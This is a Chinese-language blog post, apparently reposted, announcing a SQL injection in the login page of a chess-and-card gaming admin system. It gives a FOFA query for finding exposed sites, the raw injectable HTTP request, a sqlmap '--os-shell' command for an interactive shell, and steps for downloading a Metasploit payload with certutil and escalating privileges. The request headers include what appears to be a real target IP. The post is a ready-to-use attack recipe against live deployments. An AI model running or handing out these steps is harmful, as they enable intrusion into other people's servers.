漏洞发布 | 棋牌某源码通杀注入直接反弹shell

admin 2020年9月8日21:06:57评论1,474 views字数 1187阅读3分57秒阅读模式

直接上图

FOFA搜索词body="棋牌后台管理系统" && title=="后台登录"
漏洞发布 | 棋牌某源码通杀注入直接反弹shell

请求包

POST /Login/ValidateLogin HTTP/1.1Host: 127.0.0.1:8001Content-Length: 30Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://111.73.45.27:8001Referer: http://111.73.45.27:8001/Login/indexAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6Cookie: Hm_lvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599407883; RYQIPAI=RYCacheKey=1&RYCacheKey_ETS=2020-09-07+00%3a28%3a17&VS=07a6f8746a60ecc3; ASP.NET_SessionId=udnrj5bxpuchvrf4fs4oute3; BT_PANEL_6=3a8e87d5-ad8a-4db2-9e57-c3a1684991e0._Tklm_sxRP6Gk0jcgXfEFwQVt9Y; Hm_lpvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599429027Connection: close

userName=123*&password=321

使用方法

   上方请求包内的请求头Host参数修改成你目标域名或IP:端口,然后直接扔sqlmap执行:


sqlmap -r post.txt --os-shell

   即可获取交互shell,然后我们用win自带的certutil.exe下载msf生成的shell即可提权。


提权小思路

  • 使用MSF的UAC提权模块进行提权。

  • 使用“哥斯拉”菜刀工具的小模块进行提权加用户组。

  • 使用MSF工具的CVE漏洞模块进行提权。

注:经测试有些站点可直接拿system权限

漏洞发布 | 棋牌某源码通杀注入直接反弹shell


    关于和掌控安全撞文章事情不存在谁抄谁,毕竟漏洞总不能只有一个人能挖出来,所以看热闹的和掌控安全的老哥勿扰。

漏洞发布 | 棋牌某源码通杀注入直接反弹shell

漏洞发布 | 棋牌某源码通杀注入直接反弹shell

请注意时间



漏洞发布 | 棋牌某源码通杀注入直接反弹shell

Hi


扫二维码|关注我们

云闲|剑青

侠骨|初心



  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月8日21:06:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞发布 | 棋牌某源码通杀注入直接反弹shellhttp://cn-sec.com/archives/122756.html

发表评论

匿名网友 填写信息